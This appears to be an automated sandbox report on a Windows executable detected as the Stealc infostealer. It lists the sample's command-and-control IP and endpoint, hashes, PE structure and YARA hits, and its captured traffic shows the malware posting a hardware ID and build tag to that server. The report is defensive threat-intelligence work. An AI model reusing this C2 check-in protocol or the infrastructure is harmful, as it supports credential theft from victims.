                            http://185.215.113.37/e2b1563c6670f193.php? | file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            http://185.215.113.37t= | file.exe, 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            http://185.215.113.37/e2b1563c6670f193.phpSg | file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            http://185.215.113.37/ws | file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            http://185.215.113.37/Zg | file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            http://185.215.113.37/e2b1563c6670f193.php7 | file.exe, 00000000.00000002.2169132039.00000000019CA000.00000004.00000020.00020000.00000000.sdmp | true | | unknown
                            IP | Domain | Country | ASN | ASN Name | Malicious
                            185.215.113.37 | unknown | Portugal | 206894 | WHOLESALECONNECTIONSNL | true
                            Joe Sandbox version: 41.0.0 Charoite
                            Analysis ID: 1523652
                            Start date and time: 2024-10-01 22:15:08 +02:00
                            Joe Sandbox product: CloudBasic
                            Overall analysis duration: 0h 4m 44s
                            Hypervisor based Inspection enabled: false
                            Report type: full
                            Cookbook file name: default.jbs
                            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of new started processes analysed: 7
                            Number of new started drivers analysed: 0
                            Number of existing processes analysed: 0
                            Number of existing drivers analysed: 0
                            Number of injected processes analysed: 0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode: default
                            Analysis stop reason: Timeout
                            Sample name: file.exe
                            Detection: MAL
                            Classification: mal100.troj.evad.winEXE@1/0@0/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 80%
                            • Number of executed functions: 19
                            • Number of non-executed functions: 84
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                            • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • VT rate limit hit for: file.exe
                            No simulations
                            Match: 185.215.113.37
                            Associated Sample Name / URL | Detection | Threat Name | Context
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc | 185.215.113.37/e2b1563c6670f193.php
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37/e2b1563c6670f193.php
                            No context
                            Match: WHOLESALECONNECTIONSNL
                            Associated Sample Name / URL | Detection | Threat Name | Context
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            file.exe | malicious | Stealc | 185.215.113.37
                            file.exe | malicious | Stealc, Vidar | 185.215.113.37
                            No context
                            No context
                            No created / dropped files found
                            File type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit): 7.947730601044701
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name: file.exe
                            File size: 1'838'080 bytes
                            MD5: 7c170238c3fdf496e5420134b8f2c1e6
                            SHA1: 45c78f3c1f17a5cb39fe957ee144b69c6fc81211
                            SHA256: 33cbd0e0fa5ac49cb28c3f095077c7b82cc6127d78a0024eff5e5d9f3fc12029
                            SHA512: af3366534e37f3aab1823a121fe88f2176c1ea64c7f940de4063a69551a118629f7832f7171cf4f88e076c6d6a04d9d5a96aa3493f447d54d961cec420491fac
                            SSDEEP: 49152:KZJAJB41PcUGRVoEDXVfi60LGv6zk565Po:CAQhcUGUEDXVfauT4P
                            TLSH: 708533D59103D17ACCC7057069B72381AF68A31C03B8067AAE57E53C9CBE359F4A297E
                            File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                            Icon Hash: 00928e8e8686b000
                            Entrypoint: 0xa97000
                            Entrypoint Section: .taggant
                            Digitally signed: false
                            Imagebase: 0x400000
                            Subsystem: windows gui
                            Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
                            DLL Characteristics: DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                            Time Stamp: 0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major: 5
                            OS Version Minor: 1
                            File Version Major: 5
                            File Version Minor: 1
                            Subsystem Version Major: 5
                            Subsystem Version Minor: 1
                            Import Hash: 2eabe9054cad5152567f0699947a2c5b
                            Instruction
                            jmp 00007F8F355488DAh
                            Programming Language:
                            • [C++] VS2010 build 30319
                            • [ASM] VS2010 build 30319
                            • [ C ] VS2010 build 30319
                            • [ C ] VS2008 SP1 build 30729
                            • [IMP] VS2008 SP1 build 30729
                            • [LNK] VS2010 build 30319
                             Name | Virtual Address | Virtual Size | Is in Section
                             IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IMPORT | 0x25d050 | 0x64 | .idata
                             IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x25d1f8 | 0x8 | .idata
                             IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                             IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                             Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                             (unnamed) | 0x1000 | 0x25b000 | 0x22800 | 1d145ffa019b1e7a2b3c58db8c63a517 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .rsrc | 0x25c000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .idata | 0x25d000 | 0x1000 | 0x200 | c60c4959cc8d384ac402730cc6842bb0 | False | 0.1328125 | data | 0.9064079259880791 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             (unnamed) | 0x25e000 | 0x29d000 | 0x200 | 5e5ed1405f8b4c5eaef3e696fc964ca4 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             egzmbzjx | 0x4fb000 | 0x19b000 | 0x19a800 | c3072fa448b6439e85e69b10e43a93ae | False | 0.9948495546589525 | data | 7.953232696533616 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             cqfrfmzh | 0x696000 | 0x1000 | 0x600 | 9e5854bea59eeab5892a4ee31cb6a210 | False | 0.54296875 | data | 4.849458066052131 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             .taggant | 0x697000 | 0x3000 | 0x2200 | d32e56a9c0be527f0b65067fd536b997 | False | 0.0764016544117647 | DOS executable (COM) | 0.9973801061828198 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                             DLL | Import
                             kernel32.dll | lstrcpy
                             Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                             2024-10-01T22:16:04.772466+0200 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | TCP
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Oct 1, 2024 22:16:03.769099951 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Oct 1, 2024 22:16:03.775650024 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                             Oct 1, 2024 22:16:03.775727987 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Oct 1, 2024 22:16:03.776442051 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Oct 1, 2024 22:16:03.783281088 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                             Oct 1, 2024 22:16:04.534317017 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                             Oct 1, 2024 22:16:04.534387112 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Oct 1, 2024 22:16:04.537627935 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Oct 1, 2024 22:16:04.546217918 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                             Oct 1, 2024 22:16:04.772377968 CEST | 80 | 49710 | 185.215.113.37 | 192.168.2.6
                             Oct 1, 2024 22:16:04.772465944 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Oct 1, 2024 22:16:07.230508089 CEST | 49710 | 80 | 192.168.2.6 | 185.215.113.37
                             Timestamp | Source Port | Dest Port | Source IP | Dest IP
                             Oct 1, 2024 22:16:21.270625114 CEST | 53 | 55663 | 1.1.1.1 | 192.168.2.6
                            • 185.215.113.37
                             Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                             0 | 192.168.2.6 | 49710 | 185.215.113.37 | 80 | 6200 | C:\Users\user\Desktop\file.exe
                             Timestamp | Bytes transferred | Direction | Data
                             Oct 1, 2024 22:16:03.776442051 CEST | 89 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.37
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                             Oct 1, 2024 22:16:04.534317017 CEST | 203 | IN | HTTP/1.1 200 OK
                            Date: Tue, 01 Oct 2024 20:16:04 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                             Oct 1, 2024 22:16:04.537627935 CEST | 411 | OUT | POST /e2b1563c6670f193.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----KFBGDBFBKKJECBFHDGIE
                            Host: 185.215.113.37
                            Content-Length: 210
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                             Data Ascii (multipart body, line breaks as in the raw bytes):
                             ------KFBGDBFBKKJECBFHDGIE
                             Content-Disposition: form-data; name="hwid"

                             D596A12D1E9E487256326
                             ------KFBGDBFBKKJECBFHDGIE
                             Content-Disposition: form-data; name="build"

                             doma
                             ------KFBGDBFBKKJECBFHDGIE--
                             Oct 1, 2024 22:16:04.772377968 CEST | 210 | IN | HTTP/1.1 200 OK
                            Date: Tue, 01 Oct 2024 20:16:04 GMT
                            Server: Apache/2.4.52 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=
                            Target ID:0
                            Start time:16:16:00
                            Start date:01/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0xff0000
                            File size:1'838'080 bytes
                            MD5 hash:7C170238C3FDF496E5420134B8F2C1E6
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.2128195023.0000000005490000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2168434293.0000000000FF1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.2169132039.000000000196E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true


                              Execution Graph

                              Execution Coverage:8.4%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:9.7%
                              Total number of Nodes:2000
                              Total number of Limit Nodes:24
14027 ff45c0 2 API calls 14026->14027 14028 ff3893 14027->14028 14029 ff45c0 2 API calls 14028->14029 14030 ff38ac 14029->14030 14031 ff45c0 2 API calls 14030->14031 14032 ff38c5 14031->14032 14033 ff45c0 2 API calls 14032->14033 14034 ff38de 14033->14034 14035 ff45c0 2 API calls 14034->14035 14036 ff38f7 14035->14036 14037 ff45c0 2 API calls 14036->14037 14038 ff3910 14037->14038 14039 ff45c0 2 API calls 14038->14039 14040 ff3929 14039->14040 14041 ff45c0 2 API calls 14040->14041 14042 ff3942 14041->14042 14043 ff45c0 2 API calls 14042->14043 14044 ff395b 14043->14044 14045 ff45c0 2 API calls 14044->14045 14046 ff3974 14045->14046 14047 ff45c0 2 API calls 14046->14047 14048 ff398d 14047->14048 14049 ff45c0 2 API calls 14048->14049 14050 ff39a6 14049->14050 14051 ff45c0 2 API calls 14050->14051 14052 ff39bf 14051->14052 14053 ff45c0 2 API calls 14052->14053 14054 ff39d8 14053->14054 14055 ff45c0 2 API calls 14054->14055 14056 ff39f1 14055->14056 14057 ff45c0 2 API calls 14056->14057 14058 ff3a0a 14057->14058 14059 ff45c0 2 API calls 14058->14059 14060 ff3a23 14059->14060 14061 ff45c0 2 API calls 14060->14061 14062 ff3a3c 14061->14062 14063 ff45c0 2 API calls 14062->14063 14064 ff3a55 14063->14064 14065 ff45c0 2 API calls 14064->14065 14066 ff3a6e 14065->14066 14067 ff45c0 2 API calls 14066->14067 14068 ff3a87 14067->14068 14069 ff45c0 2 API calls 14068->14069 14070 ff3aa0 14069->14070 14071 ff45c0 2 API calls 14070->14071 14072 ff3ab9 14071->14072 14073 ff45c0 2 API calls 14072->14073 14074 ff3ad2 14073->14074 14075 ff45c0 2 API calls 14074->14075 14076 ff3aeb 14075->14076 14077 ff45c0 2 API calls 14076->14077 14078 ff3b04 14077->14078 14079 ff45c0 2 API calls 14078->14079 14080 ff3b1d 14079->14080 14081 ff45c0 2 API calls 14080->14081 14082 ff3b36 14081->14082 14083 ff45c0 2 API calls 14082->14083 14084 ff3b4f 14083->14084 14085 ff45c0 2 API calls 14084->14085 14086 ff3b68 14085->14086 14087 ff45c0 2 API calls 14086->14087 14088 ff3b81 14087->14088 14089 ff45c0 2 
API calls 14088->14089 14090 ff3b9a 14089->14090 14091 ff45c0 2 API calls 14090->14091 14092 ff3bb3 14091->14092 14093 ff45c0 2 API calls 14092->14093 14094 ff3bcc 14093->14094 14095 ff45c0 2 API calls 14094->14095 14096 ff3be5 14095->14096 14097 ff45c0 2 API calls 14096->14097 14098 ff3bfe 14097->14098 14099 ff45c0 2 API calls 14098->14099 14100 ff3c17 14099->14100 14101 ff45c0 2 API calls 14100->14101 14102 ff3c30 14101->14102 14103 ff45c0 2 API calls 14102->14103 14104 ff3c49 14103->14104 14105 ff45c0 2 API calls 14104->14105 14106 ff3c62 14105->14106 14107 ff45c0 2 API calls 14106->14107 14108 ff3c7b 14107->14108 14109 ff45c0 2 API calls 14108->14109 14110 ff3c94 14109->14110 14111 ff45c0 2 API calls 14110->14111 14112 ff3cad 14111->14112 14113 ff45c0 2 API calls 14112->14113 14114 ff3cc6 14113->14114 14115 ff45c0 2 API calls 14114->14115 14116 ff3cdf 14115->14116 14117 ff45c0 2 API calls 14116->14117 14118 ff3cf8 14117->14118 14119 ff45c0 2 API calls 14118->14119 14120 ff3d11 14119->14120 14121 ff45c0 2 API calls 14120->14121 14122 ff3d2a 14121->14122 14123 ff45c0 2 API calls 14122->14123 14124 ff3d43 14123->14124 14125 ff45c0 2 API calls 14124->14125 14126 ff3d5c 14125->14126 14127 ff45c0 2 API calls 14126->14127 14128 ff3d75 14127->14128 14129 ff45c0 2 API calls 14128->14129 14130 ff3d8e 14129->14130 14131 ff45c0 2 API calls 14130->14131 14132 ff3da7 14131->14132 14133 ff45c0 2 API calls 14132->14133 14134 ff3dc0 14133->14134 14135 ff45c0 2 API calls 14134->14135 14136 ff3dd9 14135->14136 14137 ff45c0 2 API calls 14136->14137 14138 ff3df2 14137->14138 14139 ff45c0 2 API calls 14138->14139 14140 ff3e0b 14139->14140 14141 ff45c0 2 API calls 14140->14141 14142 ff3e24 14141->14142 14143 ff45c0 2 API calls 14142->14143 14144 ff3e3d 14143->14144 14145 ff45c0 2 API calls 14144->14145 14146 ff3e56 14145->14146 14147 ff45c0 2 API calls 14146->14147 14148 ff3e6f 14147->14148 14149 ff45c0 2 API calls 14148->14149 14150 ff3e88 14149->14150 14151 ff45c0 2 API calls 
14150->14151 14152 ff3ea1 14151->14152 14153 ff45c0 2 API calls 14152->14153 14154 ff3eba 14153->14154 14155 ff45c0 2 API calls 14154->14155 14156 ff3ed3 14155->14156 14157 ff45c0 2 API calls 14156->14157 14158 ff3eec 14157->14158 14159 ff45c0 2 API calls 14158->14159 14160 ff3f05 14159->14160 14161 ff45c0 2 API calls 14160->14161 14162 ff3f1e 14161->14162 14163 ff45c0 2 API calls 14162->14163 14164 ff3f37 14163->14164 14165 ff45c0 2 API calls 14164->14165 14166 ff3f50 14165->14166 14167 ff45c0 2 API calls 14166->14167 14168 ff3f69 14167->14168 14169 ff45c0 2 API calls 14168->14169 14170 ff3f82 14169->14170 14171 ff45c0 2 API calls 14170->14171 14172 ff3f9b 14171->14172 14173 ff45c0 2 API calls 14172->14173 14174 ff3fb4 14173->14174 14175 ff45c0 2 API calls 14174->14175 14176 ff3fcd 14175->14176 14177 ff45c0 2 API calls 14176->14177 14178 ff3fe6 14177->14178 14179 ff45c0 2 API calls 14178->14179 14180 ff3fff 14179->14180 14181 ff45c0 2 API calls 14180->14181 14182 ff4018 14181->14182 14183 ff45c0 2 API calls 14182->14183 14184 ff4031 14183->14184 14185 ff45c0 2 API calls 14184->14185 14186 ff404a 14185->14186 14187 ff45c0 2 API calls 14186->14187 14188 ff4063 14187->14188 14189 ff45c0 2 API calls 14188->14189 14190 ff407c 14189->14190 14191 ff45c0 2 API calls 14190->14191 14192 ff4095 14191->14192 14193 ff45c0 2 API calls 14192->14193 14194 ff40ae 14193->14194 14195 ff45c0 2 API calls 14194->14195 14196 ff40c7 14195->14196 14197 ff45c0 2 API calls 14196->14197 14198 ff40e0 14197->14198 14199 ff45c0 2 API calls 14198->14199 14200 ff40f9 14199->14200 14201 ff45c0 2 API calls 14200->14201 14202 ff4112 14201->14202 14203 ff45c0 2 API calls 14202->14203 14204 ff412b 14203->14204 14205 ff45c0 2 API calls 14204->14205 14206 ff4144 14205->14206 14207 ff45c0 2 API calls 14206->14207 14208 ff415d 14207->14208 14209 ff45c0 2 API calls 14208->14209 14210 ff4176 14209->14210 14211 ff45c0 2 API calls 14210->14211 14212 ff418f 14211->14212 14213 ff45c0 2 API calls 14212->14213 
14214 ff41a8 14213->14214 14215 ff45c0 2 API calls 14214->14215 14216 ff41c1 14215->14216 14217 ff45c0 2 API calls 14216->14217 14218 ff41da 14217->14218 14219 ff45c0 2 API calls 14218->14219 14220 ff41f3 14219->14220 14221 ff45c0 2 API calls 14220->14221 14222 ff420c 14221->14222 14223 ff45c0 2 API calls 14222->14223 14224 ff4225 14223->14224 14225 ff45c0 2 API calls 14224->14225 14226 ff423e 14225->14226 14227 ff45c0 2 API calls 14226->14227 14228 ff4257 14227->14228 14229 ff45c0 2 API calls 14228->14229 14230 ff4270 14229->14230 14231 ff45c0 2 API calls 14230->14231 14232 ff4289 14231->14232 14233 ff45c0 2 API calls 14232->14233 14234 ff42a2 14233->14234 14235 ff45c0 2 API calls 14234->14235 14236 ff42bb 14235->14236 14237 ff45c0 2 API calls 14236->14237 14238 ff42d4 14237->14238 14239 ff45c0 2 API calls 14238->14239 14240 ff42ed 14239->14240 14241 ff45c0 2 API calls 14240->14241 14242 ff4306 14241->14242 14243 ff45c0 2 API calls 14242->14243 14244 ff431f 14243->14244 14245 ff45c0 2 API calls 14244->14245 14246 ff4338 14245->14246 14247 ff45c0 2 API calls 14246->14247 14248 ff4351 14247->14248 14249 ff45c0 2 API calls 14248->14249 14250 ff436a 14249->14250 14251 ff45c0 2 API calls 14250->14251 14252 ff4383 14251->14252 14253 ff45c0 2 API calls 14252->14253 14254 ff439c 14253->14254 14255 ff45c0 2 API calls 14254->14255 14256 ff43b5 14255->14256 14257 ff45c0 2 API calls 14256->14257 14258 ff43ce 14257->14258 14259 ff45c0 2 API calls 14258->14259 14260 ff43e7 14259->14260 14261 ff45c0 2 API calls 14260->14261 14262 ff4400 14261->14262 14263 ff45c0 2 API calls 14262->14263 14264 ff4419 14263->14264 14265 ff45c0 2 API calls 14264->14265 14266 ff4432 14265->14266 14267 ff45c0 2 API calls 14266->14267 14268 ff444b 14267->14268 14269 ff45c0 2 API calls 14268->14269 14270 ff4464 14269->14270 14271 ff45c0 2 API calls 14270->14271 14272 ff447d 14271->14272 14273 ff45c0 2 API calls 14272->14273 14274 ff4496 14273->14274 14275 ff45c0 2 API calls 14274->14275 14276 ff44af 
14275->14276 14277 ff45c0 2 API calls 14276->14277 14278 ff44c8 14277->14278 14279 ff45c0 2 API calls 14278->14279 14280 ff44e1 14279->14280 14281 ff45c0 2 API calls 14280->14281 14282 ff44fa 14281->14282 14283 ff45c0 2 API calls 14282->14283 14284 ff4513 14283->14284 14285 ff45c0 2 API calls 14284->14285 14286 ff452c 14285->14286 14287 ff45c0 2 API calls 14286->14287 14288 ff4545 14287->14288 14289 ff45c0 2 API calls 14288->14289 14290 ff455e 14289->14290 14291 ff45c0 2 API calls 14290->14291 14292 ff4577 14291->14292 14293 ff45c0 2 API calls 14292->14293 14294 ff4590 14293->14294 14295 ff45c0 2 API calls 14294->14295 14296 ff45a9 14295->14296 14297 1009c10 14296->14297 14298 1009c20 43 API calls 14297->14298 14299 100a036 8 API calls 14297->14299 14298->14299 14300 100a146 14299->14300 14301 100a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14299->14301 14302 100a153 8 API calls 14300->14302 14303 100a216 14300->14303 14301->14300 14302->14303 14304 100a298 14303->14304 14305 100a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14303->14305 14306 100a2a5 6 API calls 14304->14306 14307 100a337 14304->14307 14305->14304 14306->14307 14308 100a344 9 API calls 14307->14308 14309 100a41f 14307->14309 14308->14309 14310 100a4a2 14309->14310 14311 100a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14309->14311 14312 100a4ab GetProcAddress GetProcAddress 14310->14312 14313 100a4dc 14310->14313 14311->14310 14312->14313 14314 100a515 14313->14314 14315 100a4e5 GetProcAddress GetProcAddress 14313->14315 14316 100a612 14314->14316 14317 100a522 10 API calls 14314->14317 14315->14314 14318 100a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14316->14318 14319 100a67d 14316->14319 14317->14316 14318->14319 14320 100a686 GetProcAddress 14319->14320 14321 100a69e 14319->14321 14320->14321 14322 100a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 
14321->14322 14323 1005ca3 14321->14323 14322->14323 14324 ff1590 14323->14324 15445 ff1670 14324->15445 14327 100a7a0 lstrcpy 14328 ff15b5 14327->14328 14329 100a7a0 lstrcpy 14328->14329 14330 ff15c7 14329->14330 14331 100a7a0 lstrcpy 14330->14331 14332 ff15d9 14331->14332 14333 100a7a0 lstrcpy 14332->14333 14334 ff1663 14333->14334 14335 1005510 14334->14335 14336 1005521 14335->14336 14337 100a820 2 API calls 14336->14337 14338 100552e 14337->14338 14339 100a820 2 API calls 14338->14339 14340 100553b 14339->14340 14341 100a820 2 API calls 14340->14341 14342 1005548 14341->14342 14343 100a740 lstrcpy 14342->14343 14344 1005555 14343->14344 14345 100a740 lstrcpy 14344->14345 14346 1005562 14345->14346 14347 100a740 lstrcpy 14346->14347 14348 100556f 14347->14348 14349 100a740 lstrcpy 14348->14349 14389 100557c 14349->14389 14350 100a7a0 lstrcpy 14350->14389 14351 100a740 lstrcpy 14351->14389 14352 1005643 StrCmpCA 14352->14389 14353 10056a0 StrCmpCA 14354 10057dc 14353->14354 14353->14389 14355 100a8a0 lstrcpy 14354->14355 14356 10057e8 14355->14356 14357 100a820 2 API calls 14356->14357 14359 10057f6 14357->14359 14358 100a820 lstrlen lstrcpy 14358->14389 14362 100a820 2 API calls 14359->14362 14360 1005856 StrCmpCA 14363 1005991 14360->14363 14360->14389 14361 10051f0 20 API calls 14361->14389 14365 1005805 14362->14365 14364 100a8a0 lstrcpy 14363->14364 14366 100599d 14364->14366 14367 ff1670 lstrcpy 14365->14367 14369 100a820 2 API calls 14366->14369 14388 1005811 14367->14388 14368 ff1590 lstrcpy 14368->14389 14370 10059ab 14369->14370 14373 100a820 2 API calls 14370->14373 14371 1005a0b StrCmpCA 14374 1005a16 Sleep 14371->14374 14375 1005a28 14371->14375 14372 10052c0 25 API calls 14372->14389 14376 10059ba 14373->14376 14374->14389 14377 100a8a0 lstrcpy 14375->14377 14378 ff1670 lstrcpy 14376->14378 14379 1005a34 14377->14379 14378->14388 14380 100a820 2 API calls 14379->14380 14381 1005a43 14380->14381 14382 100a820 2 API calls 14381->14382 14383 1005a52 
14382->14383 14386 ff1670 lstrcpy 14383->14386 14384 100a8a0 lstrcpy 14384->14389 14385 100578a StrCmpCA 14385->14389 14386->14388 14387 100593f StrCmpCA 14387->14389 14388->13442 14389->14350 14389->14351 14389->14352 14389->14353 14389->14358 14389->14360 14389->14361 14389->14368 14389->14371 14389->14372 14389->14384 14389->14385 14389->14387 14391 1007553 GetVolumeInformationA 14390->14391 14392 100754c 14390->14392 14393 1007591 14391->14393 14392->14391 14394 10075fc GetProcessHeap RtlAllocateHeap 14393->14394 14395 1007628 wsprintfA 14394->14395 14396 1007619 14394->14396 14398 100a740 lstrcpy 14395->14398 14397 100a740 lstrcpy 14396->14397 14399 1005da7 14397->14399 14398->14399 14399->13463 14401 100a7a0 lstrcpy 14400->14401 14402 ff4899 14401->14402 15454 ff47b0 14402->15454 14404 ff48a5 14405 100a740 lstrcpy 14404->14405 14406 ff48d7 14405->14406 14407 100a740 lstrcpy 14406->14407 14408 ff48e4 14407->14408 14409 100a740 lstrcpy 14408->14409 14410 ff48f1 14409->14410 14411 100a740 lstrcpy 14410->14411 14412 ff48fe 14411->14412 14413 100a740 lstrcpy 14412->14413 14414 ff490b InternetOpenA StrCmpCA 14413->14414 14415 ff4944 14414->14415 14416 ff4ecb InternetCloseHandle 14415->14416 15460 1008b60 14415->15460 14418 ff4ee8 14416->14418 15475 ff9ac0 CryptStringToBinaryA 14418->15475 14419 ff4963 15468 100a920 14419->15468 14422 ff4976 14424 100a8a0 lstrcpy 14422->14424 14430 ff497f 14424->14430 14425 100a820 2 API calls 14426 ff4f05 14425->14426 14428 100a9b0 4 API calls 14426->14428 14427 ff4f27 ctype 14432 100a7a0 lstrcpy 14427->14432 14429 ff4f1b 14428->14429 14431 100a8a0 lstrcpy 14429->14431 14433 100a9b0 4 API calls 14430->14433 14431->14427 14444 ff4f57 14432->14444 14434 ff49a9 14433->14434 14435 100a8a0 lstrcpy 